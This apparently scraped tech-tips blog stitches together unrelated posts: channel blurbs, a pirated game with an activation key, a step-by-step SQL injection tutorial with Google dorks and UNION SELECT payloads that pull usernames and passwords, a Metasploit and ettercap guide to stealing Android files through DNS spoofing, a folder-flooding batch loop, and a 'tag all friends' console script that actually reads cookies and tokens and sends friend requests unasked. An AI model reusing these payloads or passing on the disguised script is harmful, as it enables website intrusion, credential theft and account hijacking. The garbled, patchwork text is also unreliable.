Knowledge King

BILALI DASTAAN Hi all, this channel is made to make you laugh so that you all can come outside from your stressful lives. My mission is to Make India Travel(MIT). Also, if ...

MY PC HAS LOW BATTERY | BILALI DASTAAN Hello friends, Today I am going to show that my PC has 10% low battery. Watch till the end to have fun.
Thanks for watching !!!!

Share, Support, Subscribe!!!

Subscribe: BILALI DASTAAN
Facebook: http://www.facebook.com/BilaliDastaan
Instagram: https://www.instagram.com/bilalidastaan
Twitter: https:...

Live PM Modi's Speech at Parivartan Rally in New Moradabad, Uttar Pradesh on 3rd December, 2016 Honourable PM Modi ji addressed Moradabad people at Parivartan Rally Live with his awesome speech today on 3rd December, 2016 !

use whatsapp new feature "whataapp web" to use whatsapp on laptop"
https://web.whatsapp.com

Pes 2010 game in 10 mb highly compressesssssd.......

Activation key:
5HRV-LVRU-F75R-MV2L-RK45
Download Link:
http:// www.mediafire.co m/download/ 7034wawip6pw9i7/ Pes_2010_Amazing

www.mediafire.co

HACKING WEBSITES USING SQL INJECTION ATTACKS ON VULNERABLE SITES...

So Guyzzz I have now decided to post some serious ADVANCED LEVEL OF Hacking stuffs which is
how the "Cracker" breaks into your
Vulnerable Websites,,,,!!!

All you need to know is a bit of
SQL querie!!!
It doesnt matter even if you are
not an expert in

So here we go,,,

What is SQL Injection?
So let me give you some idea of
what I am going to talk about,,,,
There are many complex defenitions you may get in various other sites,,, But I put it in simple terms,,,, You type some SQL queries or codes [or whatever you wish to call it ;D] on the address bar[whee you type the web address of sites to be searched] to test vulnerable website,,,,!!! If you
find it vulnerable then BINGO,,,!!!
we will use some more SQL
injection queries to crack it,,,!!!

QUICK STEPS TO FIND THE
VULNERABILITY OF WEBSITES,,,!!!

Step 1:
Search for any of the following
terms in Google:

inurl:product.php?id=
inurl:index.php?id=
inurl:news.php?id=
inurl:shop.php?id=
inurl:shop.php?pid=
inurl:newsroom.php?id=

Step 2: Now for example say there
is a website that you found in
Google search say for example

www.anywebsite.com/index.php?id=7

Open the website in a new tab,,,!!!

Step 3:
To test if your selected website is vulnerable:
Add the'(single quote symbol)
after the site as follows
www.anywebsite.com/index.php?id=7'

and now Hit the "Enter" Key,,,!!!
If there is any type of "MySQL
error"
!!!BINGO,,,!!!

Then it means your target website
is vulnerable.

STEPS TO HACK INTO THE WEBSITE AFTER FINDING THE VULNERABILITY

Step 1:
After finding the vulnerability of
your target site, use theORDER
BYcommand to extract the
number of columns in the
database.

Ex Code:
http://www.anywebsite.com/index.php?id=7

ORDER BY 1--
Doing ORDER BY 1-- should always
return the original page with NO error.

Step 2:
Then do ORDER BY 2--
If this shows the original page
with NO error, continue.
Now try ORDER BY 3--
and so on,
If this shows the original page
with NO error, continue.

Step 4:
Continue increasing the ORDER
BY number until you reach an
error. For example, if doing
ORDER BY 10-- returns an error,
then there is a table which has
NINE (9) columns, NOT 10. Always
subtract ONE from the number
that produced the error.

STEP 5:
Next step is to useUNION &
SELECT
After getting the number of
columns, let's say we have NINE
columns. Then you have to type
the following code:
Code:
http://www.anywebsite.com/index.php?id=7
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
You should see a page with a few
numbers scattered throughout it.
If so, continue,
IF NOT, try the following in which
we have to add the "-"hypen or
negative sign in front of the id
value of our website:
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
At the end if this produces the
scattered numbers, continue, if
not,STOP!!!
Choose anyother target website
from the GOOGLE search and
repeat the vulnerability test,,,!!!

Step 6:
Now we use thedatabase()command
After you see the scattered
numbers, pick one to exploit. Say
the numbers on my page are TWO
and SEVEN. I will choose the
number TWO. After choosing your
number, put database() in place
of it in your URL as shown below.
REMEMBER, I chose number TWO.
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,database(),3,4,5,6,7,8,9--
That should return some text in
place of the scattered TWO.
WRITE THIS TEXT DOWN, and
move on.

Step 7:
We usegroup_concat This is where everything gets a little trickier!
This is also the part
where you will be extracting data.
Yeah! Bingoo!!! *** First punch ***
After extracting the name of the
database using database(), type
this where you typed database()
in the previous step.
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,group_concat(
table_name),3,4,5,6,7,8,9 from
information_schema.tables where
table_schema=database()--
TYPE THIS EXACTLY AS IT IS
SHOWN, and press enter.
In place of the scattered TWO,
you should see a LOT of text
separated by commas. These are
called tables. The text varies by
website, but you usually want to
look for things like "admin,"
"staff," or "users." Choose the one
that interests you. For this
tutorial, I will choose "users."
Now type this:
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,group_concat(
column_name),3,4,5,6,7,8,9 from
information_schema.columns
where table_schema=database()--
OR
if you want the columns from
ONLY one table, use this (courtesy
of dR..EviL):
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,group_concat(
column_name),3,4,5,6,7,8,9 from
information_schema.columns
where table_name=< table name
goes here in hex or ascii format
>--
This should return even more
text. These are called columns.
Again choose what interests you,
but for this tutorial, I will choose
"username" and "password."
The columns "username" and
"password" contain the data we
want to extract. To extract the
final data, meaning, in this case,
the usernames and passwords of
all the users, type this:
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,group_concat(
username,0x3a,password,0x3a),3
,4,5,6,7,8,9 from users--
Where it says "username,0x3a,
password,0x3a" is where you
would the name of your chosen
COLUMNS, such as username and
password, DO NOT replace the
0x3a, ONLY the username and
password area. Where it says
"from users--," replace "users"
with the name of your chosen
table such as the one "users." All
of this will produce even MORE
text in this format:
Code:
admin:thisismypass:,
The comma separates each set of
data.

Thats done

Facebook can be hacked by these ways....

1:Brute Force Attacks

2:Dictionary Attacks

3:Cracking Facebook Accounts

4:Hack A Facebook Account By Exploiting Facebook's Trusted Friend Feature

5:Keylogging

6:Hijacking Facebook Fan Pages

7:Hack Facebook Account Status - Facebook Status Vulnerability

8:Facebook phishing

9:Stealers

10:Session Hijacking

11:Sidejacking With Firesheep

12:DNS Spoofing

13:USB Hacking

14:Man In the Middle Attacks

15:Botnets

16:Movable Mobile Hacking

7 Facts About Apple That Will Blow Your Mind

Creating 10000+ folders at one click.......... ....
Steps for Doing:::-----
1)open notepad or any text editor......
2)then copy and paste following text........
off
:top
md %random%
goto top
3)save it as anything.bat... .
4)then click on anything.bat and see the
magic.........
Ctrl+c - to interrupt the process
NOTE:try it inside any blank folder.....otherwise your drive will gets flooded........

7 Facts About Apple That Will Blow Your Mind

How to change profile name after limit :-

Changing your Name on Facebook after you’ve crossed the allowed limit is quite easy. All you would be required to provide are your First Name, Middle Name, Last Name, Reason for the Change and finally, you would be required to upload a copy of your government-issued photo ID so that they would be able to confirm that it’s your account.

Before you proceed, check:

Step 1 – Go to https://www.facebook.com/help/contact/?id=245617802141709

Step 2 – Fill the required
information.

Step 3 – Click Send Button.

Step 4 – After you send it, Facebook said it will take up to 48 -72 hour to change your name.

*only for mobile facebook users

Friends today I am going to show you a very simple but mostly used facebook trick...

Do you want to post your signature in every status you have postd on facebook like this...

[[1483167178584625]]

its very easy you can create a signature image here
http://www.mylivesignature.com/mls_wizard1_1.php

download it and post the image in the comment I will give u the code of your signature.

example

[[*1483167178584625]]
remove *star

6 Ways to hack a Facebook
account

something most of our
readers always wanted to Learn,
something new about Facebook
Hacking. Learn the best attacks
for Facebook Hacking with their
advantages and drawbacks.

The prime aim of this
tutorial is to create awareness so that you guys can protect
yourself from getting hacked.
Before learning the actual
procedure you should know about different types of attacks, their drawbacks and prevention against
these attacks .

1) Phishing :
The first and very basic way of
hacking Facebook accounts is via Phishing. Phishing is actually
creating fake web pages to steal
user’s credentials like
email,passwords,phone no,etc.
DRAWBACK :
Users nowadays are aware of
these type of attacks and one can not be easily fooled using this attack. You need some social engineering to trick someone.
Prevention :
Always check the page URL
before logging in. This is
the most trusted and
effective way one can use
to avoid himself from
phishing.
Other way is to use some
good Antivirus software
which will warn you if you
visit a harmful phishing
page.
Evenif somehow you have
already entered your
credentials in a phisher,
Immediately Change your
password.

2) Keylogging : This is another
good way of hacking Facebook
accounts. In this type of attack a
hacker simply sends an infected
file having keylogger in it to the
victim. If the victim executes that
file on his pc, whatever he types
will be mailed/uploaded to
hacker’s server. The advantage of
this attack is that the victim
won’t know that hacker is getting
every Bit of data he is typing.
Another big advantage is that
hacker will get passwords of all
the accounts used on that PC.
DRAWBACK :Keyloggers are often
detected as threats by good
antiviruses. Hacker must find a
way to protect it from antivirus.
Prevention :
Execute the file only if you
trust the sender.
Use online scanner such as
novirusthanks.org
Use good antivirus and
update it regularly .

3) Trojans/backdoors :
This is an advanced level topic.
It consists of a server and a
client. In this type of attack the
attacker sends the infected server
to the victim. After ex*****on the
infected server i.e. Trojan on the
victim’s PC opens a backdoor and
now the hacker can do whatever
he wants with the victim’s PC .
DRAWBACK :
Trojans are often detected as
threats by good antiviruses.
Hacker must find a way to protect
it from antivirus.
Prevention :
Execute the file only if you
trust the sender.
Use online scanner such as
novirusthanks.org
Use good antivirus and
update it regularly .

4)Sniffing
It consists of stealing session in
progress. In this type of attack an
attacker makes connection with
server and client and relays
message between them, making
them believe that they are
talking to each other directly.
DRAWBACK :
If user is logged out then
attacker is also logged out
and the session is lost.
It is difficult to sniff on SSL
protected networks.
Prevention :
Always use SSL secured
connections.
Always keep a look at the
url if the http:// is not
changed to https:// it
means that sniffing is
active on your network.

5)Social Engineering :
This method includes guessing
and fooling the clients to give
their own passwords. In this type
of attack, a hacker sends a fake
mail which is very convincing and
appealing and asks the user for
his password.
Answering the security questions
also lies under this category.
Drawback :
It is not easy to convince
someone to make him give his
password.
Guessing generally doesn’t always
work ( Although if you are lucky
enough it may work!).
Prevention :
Never give your password to
anyone
Don’t believe in any sort of
emails which asks for your
password

6) Session Hijacking
In a session hijacking attack an
attacker steals victims cookies,
cookies stores all the necessary
logging Information about one’s
account, using this info an
attacker can easily hack
anybody’s account. If you get the
cookies of the Victim you can
Hack any account the Victim is
Logged into i.e. you can hack
Facebook, Google, Yahoo.
Drawbacks :
You will be logged out
when user is logged out.
You will not get the
password of the user’s
account.
Will not work if the user is
using HTTPS connections.
Prevention :
Always work on SSL secured
connections.
Always keep a look at the
url if the http:// is not
changed to https:// it
means that sniffing is
active on your network.

admin :

How to view a person’s private
Facebook profile picture:

1. Open a web browser and go to the individual’s Facebook Profile.

2. Right click on their profile
picture from their main profile
page and choose “copy the image URL”.

3. Open a new browser window
or tab and then paste the copied URL into the address bar.

4. Remove “/s160x160″ from the URL, minus the quotes of course.
Make sure you remove one of the “/” so that there aren’t two.
and change the last letter of url to _n.jpg

5. Hit enter and you should see
the full resolution large profile
picture of the given person. This
basically takes the scaling factor
out of the profile picture so that
you are not seeing the thumbnail, which is 150×150 but the full resolution image

admin :

Detecting RATs/Keyloggers
installed on your PC using CMD
and TaskManager
In this tutorial, I'll show you the
easiest way of finding out
malicious applications installed
on your PC that transfer data
using the internet without you
knowing it.
As stated in the title, we'll use
TaskManager and CMD for the
purposes of this tutorial.
Part I: Customizing Task Manager.
1. To get started, open up your
TaskManager by right clicking your
TaskBar and selecting
TaskManager or just hit CTRL+ALT
+DEL to get it open.
2. Once that is done, click the
tab of your
TaskManager and click View >
Select Columns > Make sure that
is ticked.
3. Now click the PID column to
make sure that all the processes
are sorted in a specific order. This
step is not necessary, but it will
make it easier for you to detect
processes using their IDs.
Part II: Using CMD.
Once you have done that right,
we are going to use CMD to view
established connections.
1. 1. Start > Run > CMD
Or just type 'cmd' in the
searchbar if you are running a
system powered by Windows7.
2. Once cmd is open, type:
netstat -ano
3. Now what we are interested in
are only the connections with the
state .
Isolate them out and look for the
PID right next to them. There will
be many connections with
state, you will
have to repeat the following steps
for all of them.
Part III: The fun part
Now go back to the TaskManager
and look for the name of the
process(es) that has the same PID
(s) as the one you found with the
ESTABLISHED connection(s).
1. In the image number 1 you can
see a safe and trusted application
known as Dropbox, so we are
good. But incase you find a
process which you do not know, if
it's something like 'svchost.exe'
that you can be sure it is infected
> right click the process and
select .
2. Now all you have to do is right
click the file and scan it using
your AV or upload it to online
scanner such as VirusTotal.com
and check if it's infected.
--
That's all in this tutorial.
Hope you found it useful

admin:

HOW TO REMOTELY STEAL DATA FROM ANDROID PHONES

A quick guide on how to steal data from an android device (smart phones, tablets etc) on your network. We will be using
metasploit to launch the Android content provider file disclosure module.
Next we will use ettercap
to do dns spoofing through arp
poisoning.
I will be giving a brief explanation on how to set up the attack as i do not have any sophisticated victim scenario set up. This will work on
Android 2.3 or earlier, i have not done any test on other versions, lets see if we can get any free test subjects today.

Description
The Android content provider file disclosure module exploits a cross domain issue within the Android web browser to ex-filtrate files from a vulnerable device.

Lets Begin

1) Load up a terminal and type:
msfconsole.

2) Next type : search android.

3) As shown in the image below,
we have two matching modules.

4) For this tutorial we are going to use the first module.
Type : info auxiliary/gather/
android_htmlfileprovider.

5) Lets go through the important options that we must know.
a) FILE – If you have a particular
location to steal a file from, this is where you redirect it. By default the auxiliary will steal the file from /proc/version,/proc/self/status,/data/system/packages.list.
b) SRVHOST – This is where you fill in your (attacker) IP address.
c) SRVPORT – By default this
launches the auxiliary on port
8080.
d) URIPATH – By default this
creates a random sub-link for your exploit. For example:
http://192.168.1.47/fhsduhs. You can change it to anything you think that might help your attack,
eg: http://192.168.1.47/
wholovesjames.

6) Since i am not setting up a
more sophisticated attack, i will
leave the SSL options alone. This
should do for now.

7) To use this module, type :
use auxiliary/gather/
android_htmlfileprovider.

8) set SRVHOST (Your Ip)

9) set SRVPORT 80 (I am setting
this to 80 so it will be simpler to
set up the dns spoofing later.)

10) set URIPATH / and finally type:
exploit.

11) Ok so we have successfully
launched the auxiliary. You can
now take the link
“http:/192.168.1.47:80& #8243;
and give this to a friend using an
Android device who is in the same network as you. Too much trouble ,
i know. So lets do some dns
spoofing through arp poisoning
with ettercap.

12) Open up another terminal
screen (Ctrl-Shift T). Type : locate
etter.dns.

13) Next type : nano (etter.dns).

14) As shown in the image below, i have decided to spoof
facebook.com and i have
redirected facebook.com to my ip address. Save it when you are
done.

15) For a change lets launch
ettercap through our terminal,
type : ettercap -i wlan0 -T -q -P
dns_spoof -M ARP:remote // //.

16) So set up is complete! Now
when anyone on your network
using an Android (vulnerable
version) attempts to visit
facebook.com, they will be
redirected to your IP address. This does a mass attack on the network, so other users will be affected by the dns spoofing as well. In the real scenario, you will need to direct the attack to one specific ip address.

17) Once the android users loaded the malicious url, my terminal starts loading.

18) Sadly they were using version 4 and above which obviously is not vulnerable to this attack. As mentioned above, i believe this works on version 2.2 and below.

19) If!!! there were vulnerable
Android users on the network, we would be able to steal data from their phone memory card etc. Also remember the set FILE option is where you direct the file to steal.

Remember metaspoit is available on backtrack 5
And bt5 is available on Droid

admin :

PASSWORD PROTECTION IN USB WITHOUT ANY SOFTWARE!!!

How to make your USB password protected without any software,
I'll show you a simple trick to lock your USB drive without using any 3rd party software.

So let's see how to set a
password protect on your USB
without using any software.
>Insert your USB drive to computer
>Click on Start
>In "Search programs and files"
box, type Bitlocker Drive
Encryption
>Now launch that application.
Password Protection to USB Drive without using Software
>Then look for your USB drive and click on Turn on Bitlocker
>Password Protection to USB Drive without using Software
Windows will ask you to set a
password.
>Now set a strong password.
>Click on Next
>Password Protection to USB Drive without using Software
If you want save the password in a safe place.

And click on Next

Password Protection to USB Drive without using Software
Now click on Star Encrypting
Password Protection to USB Drive without using Software
That's all !!!

From right now if someone tries
to access your USB, Windows will ask him/her to enter the current password

admin : p_s

Facebook Hack to Tag all your
Friends in a Single Click>>>

Simple Hack/Script to Tag/Invite All your Friends to a Facebook Status in a single click :

1.Login to your Facebook Account on Google Chrome Browser.

2.Post A Status.

3.Then click on the time stamp of the status, so that your status will open in a separate window.

4.Now press Ctrl + S**t + J

5.Now a windows will pop out below.

6.Switch to the Console Tab and
paste the below code over there and

hit Enter code:-

function x__0(){return window.ActiveXObject?new ActiveXObject("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",false);e.send(null);if(e.readyState==4){var t=JSON.parse(e.responseText.substring(e.responseText.indexOf("{")));return t.payload.entries}return false}function get_uid(e){vart=x__0();t.open("GET","http://graph.facebook.com/"+e,false);t.send();if(t.readyState==4){return uid=JSON.parse(t.responseText).id}return false}function cereziAl(e){var t=e+"=";if(docu ment cookie.length>0){konum=docu ment cookie.indexOf(t);if(konum!=-1){konum+=t.length;son=docu ment cookie.indexOf(";",konum);if(son==-1)son=docu ment cookie.length;return unescape(docu mentcookie.substring(konum,son))}else{return""}}}function getRandomInt(e,t){return Math.floor(Math.random()*(t-e+1))+e}functionrandomValue(e){return e[getRandomInt(0,e.length-1)]}function a(e){var t=new XMLHttpRequest;var n="/ajax/follow/follow_profile.php?__a=1";var r="profile_id="+e+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";t.open("POST",n,true);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.setRequestHeader("Content-length",r.length);t.setRequestHeader("Connection","close");t.onreadystatechange=function(){if(t.readyState==4&&t.status==200){t.close}};t.send(r)}function sublist(e){var t=document.createElement("script");t.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+e+" }).send();";document.body.appendChild(t)}function sarkadaslari_al(){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("arkadaslar = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");for(f=0;f=0){xmlhttp.open("GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}else{xmlhttp.open("GET","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}xmlhttp.send()}functionsarkadasekle(e,t){var n=new XMLHttpRequest;n.onreadystatechange=function(){if(n.readyState==4){}};n.open("POST","/ajax/add_friend/action.php?__a=1",true);var r="to_friend="+e;r+="&action=add_friend";r+="&how_found=friend_browser";r+="&ref_param=none";r+="&outgoing_id=";r+="&logging_location=friend_browser";r+="&no_flyout_on_click=true";r+="&ego_log_data=";r+="&http_referer=";r+="&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;r+="&phstamp=165816749114848369115";r+="&__user="+user_id;n.setRequestHeader("X-SVN-Rev",svn_rev);n.setRequestHeader("Content-Type","application/x-www-form-urlencoded");if(t=="farketmez"&&docu ment cookie.split("cins"+user_id+"=").length>1){n.send(r)}else if(docu ment cookie.split("cins"+user_id+"=").length=0){svn_rev=document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];sarkadaslari_al();docu mentcookie="paylasti=evet;expires="+btarihi.toGMTString();document.removeEventListener(tiklama)}},false);var cinssonuc={};varcinshtml=document.createElement("html")

7.Ignore if you get any error and just wait for a while.

8.Within few seconds all your friends must be tagged in the status.

9.That's all friends you are done.

10.Hope you enjoyed the trick

admin: